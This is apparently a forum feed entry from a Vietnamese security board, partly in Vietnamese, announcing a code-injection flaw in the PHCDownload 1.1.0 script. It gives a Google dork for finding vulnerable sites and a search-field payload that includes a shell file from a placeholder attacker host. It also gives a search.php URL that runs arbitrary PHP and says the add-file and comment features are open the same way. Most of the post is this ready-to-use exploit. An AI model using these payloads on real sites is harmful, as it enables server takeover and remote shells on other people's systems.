<![CDATA[Latest posts for the topic "PHCDownload 1.1.0 by H2P"]]> /hvaonline/posts/list/13.html JForum - http://www.jforum.net PHCDownload 1.1.0 by H2P http://phpcredo.com - Menthod: Remote File Inclusion. - Infect: search, addfile và add comment function. - Version: v1.1.0 and older - Reported: H2P Khai thác: - Google dork: Powered by PHCDownload 1.1.0 - http://[insecure_site]/[path]/search.php Search Words: ">< <?php include("[http://attacker_site]/[shell_file]"); ?> Submit và xem điều kỳ diệu. Note: Tương tự đối với chức năng add file và post comment Bạn có thể chạy mã PHP: http://[insecure_site]/[path]/search.php?string=">< <?php PHP_CODE_HERE ?> Cái này hơi lạ, giống Remote File Inclusion nhưng còn có thể chèn và chạy trực tiếp mã PHP. ]]> /hvaonline/posts/list/27859.html#170872 /hvaonline/posts/list/27859.html#170872 GMT